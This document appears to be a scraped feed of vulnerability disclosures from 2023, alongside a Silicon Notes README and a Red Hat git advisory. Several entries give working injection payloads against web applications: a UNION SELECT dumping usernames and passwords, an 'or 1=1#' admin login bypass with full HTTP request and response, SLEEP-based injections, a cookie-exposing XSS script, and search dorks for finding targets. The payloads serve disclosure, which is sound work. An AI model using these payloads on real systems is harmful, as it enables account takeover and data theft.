Affiliate Me version 5.0.1 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection[#] Exploit Date: May 16, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: Affiliate Me[#] Application Version: 5.0.1[#] Vendor: https://www.powerstonegh.com/[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]/admin.php?show=reply&id=[Injected Query][#] 3xample:[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -[#] Notes:- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.

Affiliate Me 5.0.1 SQL Injection

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it.

POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID\=n8igimmg4o7ddmpnbfueujouvg
Content\-Length: 62
Cache\-Control: max\-age\=0
Sec\-Ch\-Ua: "Not:A-Brand";v\="99", "Chromium";v\="112"
Sec\-Ch\-Ua\-Mobile: ?0
Sec\-Ch\-Ua\-Platform: "Windows"
Upgrade\-Insecure\-Requests: 1
Origin: https://pwnedhost.com
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">

<head>
  
  <title>Old Age Home Management System|| Dashboard</title>
  
  <link rel="stylesheet" href="vendors/typicons/typicons.css">
  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
  <link rel="stylesheet" href="css/vertical-layout-light/style.css">
  
  
</head>

CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

IT Sourcecode Content Management System Project In PHP and MySQL With Source Code 1.0.0 is vulnerable to Cross Site Scripting (XSS) via /ecodesource/search_list.php.

**Content-Management-Systemv1.0-has-Cross-site-Scripting-XSS-**

Content Management System In PHP With Source Code has Cross-site Scripting (XSS)

Vul\_Author: TzssZ

vendors: https://itsourcecode.com/free-projects/php-project/content-management-system-in-php-with-source-code/

Vulnerability File: /ecodesource/search\_list.php

Vulnerability location: POST /ecodesource/search\_list.php HTTP/1.1\\r\\n

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an example with alert: 

When you enter the system,click 'search' 

input a XSS script in input boxes,such as "<script>alert(document.cookie)</script>",it will expose cookie.

click search,and you will obtain its cookie.

CVE-2023-31816: GitHub - TzssZ/Content-Management-System-v1.0-has-Cross-site-Scripting-XSS-: Content Management System In PHP With Source Code has Cross-site Scripting (XSS)

GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field.

**What's all this, then?!**

Silicon Notes: A somewhat lightweight, low-friction personal knowledge base.

Features:

*   Plaintext editing in Markdown, rendering in HTML
*   Language syntax highlighting in rendered HTML
*   Bi-directional page relationships
*   Powerful full-text and page title search
*   Page history
*   A table of contents in the left sidebar, where it belongs
*   A quite-usable mobile layout
*   Built-in documentation
*   No-frills UI
*   No big frameworks, just a few smallish dependencies

For the rationale on why this was created and paper-thin justifications on certain design decisions, see this blog article.

  **Tech Stack**

Projects we rely on and appreciate!

*   Python, of course.
*   Poetry for project management.
*   Flask, the micro-framework.
*   Mistune to render Markdown into HTML.
*   Pygments for syntax highlighting of code blocks.
*   python-slugify creates URL-friendly "slugs" from strings.
*   python-dotenv for configuration management.
*   Gunicorn for deployment.
*   Pytest and Beautiful Soup for functional testing.
*   CodeMirror (optional) for editor syntax highlighting

**Quickstart**

This project is configured and deployed much like any other Flask project. For details, see the Flask configuration handling Docs.

**Docker or Podman**

If you want to take this for a quick spin, the following commands should get you going. You obviously need to have Docker installed. (If you have Podman, simply substitute docker for podman.)

docker run \\
  -ti \\
  --rm \\
  -p 127.0.0.1:5000:5000 \\
  -v silicon\_instance:/home/silicon/instance \\
  docker.io/bityard/silicon

And then open http://localhost:5000/ with your local web browser.

You could also start it with docker-compose (or docker compose):

cd deploy/docker-local
docker-compose up

If you want to build the image, a Dockerfile and a docker-compose.yaml file are provided, so you can build the container with:

docker build -t docker.io/bityard/silicon .

Or with buildah:

buildah build --format docker -t docker.io/bityard/silicon .

Silicon will listen on port 5000 (plaintext HTTP) and stores all application data in /home/silicon/instance.

**Development****Prerequisites**

This project requires Python 3.9 or greater. On a Debian/Ubuntu system, that means the following packages:

*   python3
*   python3-pip (unless installed via other means)
*   python3-dev
*   python3-venv
*   npm (or docker) (optional to enable CodeMirror editor)

Install Poetry if necessary. Everyone has their own way of setting up their Python tooling but I'm a fan of pipx:

pip3 install --user pipx
pipx install poetry

**Setup**

Use poetry to create a virtual environment and install the dependencies:

Flask is configured via environment variables. There is a file called .flaskenv which sets the name of the app. If you want to run flask from somewhere else, you will need to set:

All other settings can either be set as environment variables or written to a file named .env in the project root. For development, this will suffice:

FLASK\_ENV=development
WERKZEUG\_DEBUG\_PIN=off

You can set any environment variables mentioned in the Flask or Werkzeug docs, but these are some you might care to know about:

*   FLASK_ENV: production (default), or development
*   FLASK_RUN_HOST: defaults to 127.0.0.1
*   FLASK_RUN_PORT: defaults to 5000
*   INSTANCE_PATH: where the silicon data (in particular the database) is stored
*   WERKZEUG_DEBUG_PIN: the PIN to enable the Werkzeug debug console. Set to "off" to disable it if you are sure the app is only listening on localhost.
*   SECRET_KEY: A string used in session cookies. For development purposes, this can be anything, but for production it should be a 16-byte (or larger) string of random characters. Setting this is optional as the app will create one (and write it to a file in INSTANCE_PATH) if one doesn't exist.
*   SILICON_EDITOR: When set to textarea, this disables the CodeMirror text editor when editing pages and uses a standard textarea element instead.

To initialize the database after the configuration settings have been set, run the following command. It will create an instance directory in the root of the project and initialize the SQLite database from schema.sql.

**Running Silicon**

Run the project via the flask development server:

Unless you changed the defaults, you should be able to access the UI on http://localhost:5000/

**Running tests and flake8**

To run the tests, install the dev dependencies and run pytest:

poetry install --with dev
poetry run pytest

If you have a tmpfs filesystem, you can set the TMP environment variable to have test databases created there (which is faster and results in less wear-and-tear on your disk):

TMP=/dev/shm poetry run pytest

To make sure all code is formatted to flake8 standards, run flake8:

**Production Deployment**

Silicon Notes is a fairly simple web application which contains no built-in authentication or authorization mechanisms whatsoever. If deploying the application on its own, you should only deploy this to a trusted private network such as a local LAN segregated from the public Internet by a firewall or VPN. **If deploying on a public server, you are responsible for ensuring all access to it is secure.**

The deploy direcctory contains various sample deployments that may be helpful as starting points for a production deployment.

Normally, it is easiest to host applications like this on their own domain or subdomain, such as https://silicon.example.com/. If you would rather host it under a prefix instead (as in https://example.com/silicon), see this issue for hints on how to do that.

**Configuring the CodeMirror Editor**

Support for CodeMirror as a text editor is included by default. It does add a lot of "heft" to the UI, mostly around having to make a separate network request for each language and addon specified. To use it, you also have to install third-party Javascript/CSS static packages by running ONE of the following commands:

# If you have \`npm\` installed locally
(cd silicon/static && npm install)

Or:

# if you have \`docker\` installed
docker run -ti --rm -v $PWD/silicon/static:/app -w /app node:alpine npm install

Currently only a handful of languages are enabled for syntax highlighting, if you want to edit the list to suit your needs, you can edit silicon/static/js/edit.js. You can find a list of supported lanauges here.

To disable CodeMirror and use a regular textarea instead, add the following to your .env file or environment:

**Data Export and Import****SQL**

In the event that a database migration is needed, follow these steps:

1.  Stop the Silicon instance.
2.  Pull down the latest version of this repository.
3.  Run scripts/dump.sh > silicon_data.sql.

To import the data:

4.  Move or rename the old instance/silicon.sqlite, if it exists.
5.  Run poetry run flask init-db.
6.  Run sqlite3 instance/silicon.sqlite < silicon_data.sql.
7.  Start the Silicon instance.

Once you are satisfied that there are no issues, you can archive (or delete) the old silicon.sqlite file and silicon_data.sql.

**JSON**

If you want to dump your data as JSON (perhaps to import into another system or hack on with your own tools), these scripts are not well tested but might do the job.

Export:

#!/usr/bin/env sh

DB=instance/silicon.sqlite

for table in pages relationships; do
    sqlite3 $DB -cmd '.mode json' "select \* from $table;" \> $table.json
done

Import:

#!/usr/bin/env sh

sqlite3 instance/silicon.sqlite << EOF
INSERT INTO pages (revision, title, body)
SELECT
    json\_extract(value, '$.revision'),
    json\_extract(value, '$.title'),
    json\_extract(value, '$.body')
FROM json\_each(readfile('pages.json'));
INSERT INTO relationships
SELECT
    json\_extract(value, '$.title\_a'),
    json\_extract(value, '$.title\_a')
FROM json\_each(readfile('relationships.json'));
EOF

**Suggested Contributions****Clean Up CSS**

The current style sheets were more or less arrived at by trial and error. Any help in organizing the rules in a more coherent yet extensible way would be much appreciated.

**Dark Theme**

It would be nice if the CSS adjusted itself to a dark theme based on the preference set by the user in the browser. This should be pretty easy since almost all of the colors are in one file.

**Clean up Javascript**

To put it mildly, my JS skills are not the best. I would very much appreciate any suggestions on improvements to the small amount of code there is, or whether there is a better way to organize it. I won't bring in any kind of Javascript "build" tool as a project dependency, though.

**Diffs Between Revisions**

This is pretty standard on wiki-like apps, but it's not a critical feature for me so I haven't yet mustered up the fortitude to implement it. (It would also likely involve adding a diff library as a dependency.)

**Redirect to Slugified URL**

We currently "slugify" the page title in at least two places:

1.  When building the URL for an internal page link generated from wiki link syntax [[like this]] in render.py.
2.  When processing requests with page titles in the URLs for certain routes in views.py.

In the second case, page titles are slugified immediately, meaning every instance of the page title is slugified in the HTML. However, the URL will still contain the non-slugified title. This is pretty much purely cosmetic, but it would be nice if the application could immediately redirect to a slugified page title instead, if necessary.

I found lots of ugly ways to do this but nothing I was comfortable shipping.

**Draft Feature / Autosave / Leap-frog Detection**

To prevent the loss of unsaved changes while editing, we use the browser's "are you sure?" nag if there has been a change to the editing area since the page was loaded. However, there are still (at least) two opportunies to lose work:

1.  The browser crashes.
2.  Two simulatenous edits of a page in separate tabs or windows.

The first is rare and the second is not as serious since both revisions are saved. But it is currently up to the user to recognize what happened and remedy the situation by hand.

These are technically three separate features but I believe they would be quite closely coupled if implemented together.

**Refine Tests**

The tests directory contains functional tests that were deemed the most important. But they could be better organized and optimized/flexible. Code coverage is not likely very high. Some tests are lacking or missing because I was not able to work out the right way to test certain things.

**Add Anchors to Headings**

Anchors on headers are a very common feature on various CMSes. They let you link directly to headings, e.g.:

http://example.com/view/page\_title#some-section

**Implement a (Better) Task List Plugin**

Mistune (the Markdown->HTML renderer) ships with a task\_lists plugin. It is functional, but it renders task list items inside an ordinary <ol> as just another kind of list item. This means the task list items get prefixed with _both_ a bullet point and a checkbox. IMO, this is fairly ugly and the "right" way to display a task list item is the have the checkbox replace the bullet point.

To do this right, I think task lists should be their own separate kind of list rather than just another item type in regular lists. It should be possible to accomplish this with a Mistune plugin.

CVE-2023-31584: GitHub - cu/silicon: Silicon Notes, a web-based personal knowledge base with few frills

Red Hat Security Advisory 2023-3248-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:3248-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3248  
Issue date:        2023-05-22  
CVE Names:         CVE-2023-25652 CVE-2023-25815 CVE-2023-29007  
====================================================================  
1. Summary:

An update for git is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: by feeding specially crafted input to `git apply --reject`, a path  
outside the working tree can be overwritten with partially controlled  
contents (CVE-2023-25652)

* git: arbitrary configuration injection when renaming or deleting a  
section from a configuration file (CVE-2023-29007)

* git: malicious placement of crafted messages when git was compiled with  
runtime prefix (CVE-2023-25815)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2188333 - CVE-2023-25652 git: by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents  
2188337 - CVE-2023-25815 git: malicious placement of crafted messages when git was compiled with runtime prefix  
2188338 - CVE-2023-29007 git: arbitrary configuration injection when renaming or deleting a section from a configuration file

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
git-2.31.1-5.el9_0.src.rpm

aarch64:  
git-2.31.1-5.el9_0.aarch64.rpm  
git-core-2.31.1-5.el9_0.aarch64.rpm  
git-core-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-credential-libsecret-2.31.1-5.el9_0.aarch64.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-daemon-2.31.1-5.el9_0.aarch64.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-debugsource-2.31.1-5.el9_0.aarch64.rpm  
git-subtree-2.31.1-5.el9_0.aarch64.rpm

noarch:  
git-all-2.31.1-5.el9_0.noarch.rpm  
git-core-doc-2.31.1-5.el9_0.noarch.rpm  
git-email-2.31.1-5.el9_0.noarch.rpm  
git-gui-2.31.1-5.el9_0.noarch.rpm  
git-instaweb-2.31.1-5.el9_0.noarch.rpm  
git-svn-2.31.1-5.el9_0.noarch.rpm  
gitk-2.31.1-5.el9_0.noarch.rpm  
gitweb-2.31.1-5.el9_0.noarch.rpm  
perl-Git-2.31.1-5.el9_0.noarch.rpm  
perl-Git-SVN-2.31.1-5.el9_0.noarch.rpm

ppc64le:  
git-2.31.1-5.el9_0.ppc64le.rpm  
git-core-2.31.1-5.el9_0.ppc64le.rpm  
git-core-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-credential-libsecret-2.31.1-5.el9_0.ppc64le.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-daemon-2.31.1-5.el9_0.ppc64le.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-debugsource-2.31.1-5.el9_0.ppc64le.rpm  
git-subtree-2.31.1-5.el9_0.ppc64le.rpm

s390x:  
git-2.31.1-5.el9_0.s390x.rpm  
git-core-2.31.1-5.el9_0.s390x.rpm  
git-core-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-credential-libsecret-2.31.1-5.el9_0.s390x.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-daemon-2.31.1-5.el9_0.s390x.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-debugsource-2.31.1-5.el9_0.s390x.rpm  
git-subtree-2.31.1-5.el9_0.s390x.rpm

x86_64:  
git-2.31.1-5.el9_0.x86_64.rpm  
git-core-2.31.1-5.el9_0.x86_64.rpm  
git-core-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-credential-libsecret-2.31.1-5.el9_0.x86_64.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-daemon-2.31.1-5.el9_0.x86_64.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-debugsource-2.31.1-5.el9_0.x86_64.rpm  
git-subtree-2.31.1-5.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGskgdzjgjWX9erEAQj5DA//e9/tITQA5CIJBEKojXtF/rGbRLbt3ns9  
fez8K07pUEBnzVr0JF91Rem+NBqblyWtLIxGHrgG49Jgq5oyl3CWQwHVoet+kg9m  
Op4rA3Wll1B3OyHak7FsXNveLK8IU39qiKWo6DeWyj5fTeJCjb0Bi7lziSBAOsIY  
i8vQHa9kx4WdgTIwXj+b8nEr718UAVgO8N/d82sqS9dL4R1y0gTkDZDGNFs69edw  
p0d9YEbWBc4Ucj/Mp3NIK8O3mz+NLrtKdvcwk8s/3s6xtVR2FckpIq4zDpvlZhMT  
OIj5G04ig/UshzMWrmGEnqucKyH9MvTuKJ3Le/rQDCAwYYyDYMRdzmFOr39lIvxD  
mm6gc+JzJLl2RLOSqDkp+wmeA9Yvw6hcltysqLAsDPYxmiwveOEguAnZUJh6oOXl  
WYWZha84aUzFqdP24kuZ4gK+BHetMIL5uXfxHDILhaxuzWibC/VcN3o7dOxEp2lw  
Gk/tO7I35FznCeZibQA85doGDoBMR+OUdm3kHEXO4BMn6TV5nC8MUrbcpipv5spN  
nqxpkDWSRlrUln5l8mWbw9hWKIqFnkG/+zVUumgJygVJq8l7KtaDty7NLKn8J01r  
Wa8AnPc5idUTinlTmzFzvNFEtzC32gA6wDMWjNUTTWmBJAUboDlas6cRRfjFfiGL  
QSX2fDzbwrQ=jpwm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3248-01

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: WBiz Desk 1.2 - SQL Injection[#] Exploit Date: May 12, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: WBiz Desk[#] Application Version: 1.2[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]//ticket.php?tk=[SQL Injection][#] 3xample:[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -[#] Notes:- The vulnerability requires a non-admin privilege (normal) user to be exploited.

WBiz Desk 1.2 SQL Injection

Esg version 2.5 suffers from a remote SQL injection vulnerability.

    ===========================================================================================| # Title     : Esg 2.5 Sql Injection Vulnerability                                       || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : news.php?tayear=2023[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here[+] Panel : /admin/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Esg 2.5 SQL Injection

Code Bakers version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Code Bakers v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.codebakers.co.uk/                                                                                      |  | # Dork      : "dishes.php?res_id="                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /dishes.php?res_id= <===== inject here [+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Code Bakers 1.0 SQL Injection

Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on kanban board can insert JavaScript code in in "Reaction to comment" feature.

CVE-2023-31779: wekan/CHANGELOG.md at master · wekan/wekan

 SQL Injection in GitHub repository unilogies/bumsys prior to 2.2.0.

**Description**

An administrator user can use different operations and parameters to execute SQL queries.

\-customerId on operations getCustomerPaymentInfo and getCustomerStatementInfo.

\-empId on operations getEmpSalaryData, getEmpLoanLoanData, getEmployeeAdvancePaymentsData.

\-company_id on operation getCompanyDueBillDetails.

A similar case was reported and fixed on productDetailsForReturn operation in this bounty, but this endpoints are still vulnerable.

**Proof of Concept**

All the vulnerable php code is in core/ajax/ajax_data.php.

**customerId Parameter**

There are 3 different points where an SQL Injection can be triggered with customerId parameter.

First of them is on line 827, on getCustomerPaymentInfo operation. The parameter is obtained from query on line 792 and it is sanitized with safe_input method.

However, the parameter is setted on the SQL Query assuming that is an Integer and it is not enforced using quotes:

That's why we can inject malicious SQL Queries as:

customerId=1+OR+(SELECT+SLEEP(5))

As we can see, the response is delayed 5 seconds because it is executing the Sleep.

The second and third vulnerable codes are on getCustomerStatementInfo, on lines 899 and 938, where the customerId is also appended without quotes:

In this case, as the customerId is used in 2 different queries, we can see that the request is delayed 2 times (10 seconds).

**empId Parameter**

There are 3 different points where an SQL Injection can be triggered with empId parameter.

First of them is on line 780, on getEmpSalaryData operation. The parameter is obtained from query on line 764 and it is sanitized with safe_input method.

However, the parameter is setted on the SQL Query assuming that is an Integer and it is not enforced using quotes:

That's why we can inject malicious SQL Queries as:

empId=1+AND+(SELECT+SLEEP(5))

As we can see, the response is delayed 5 seconds because it is executing the Sleep.

The second vulnerable code is on getEmpLoanLoanData, on line 967, where the empId is also appended without quotes:

The third vulnerable code is on getEmployeeAdvancePaymentsData, on line 1045, where the empId is also appended without quotes:

**company\_id Parameter**

The last vulnerable code is on getCompanyDueBillDetails, on line 1092. There is using another parameter, company_id, that it is also sanitised with safe_input method.

However, as in the other cases, it is appended as integer without quotes.

In all this cases, the fix is the same as on the other bounty stated above.

**Impact**

A user with administrator privileges can run SQL queries on database. This can be used to retrieve sensitive data, change database information or any other malicious activity against the database.

**Occurrences**

Tag

#sql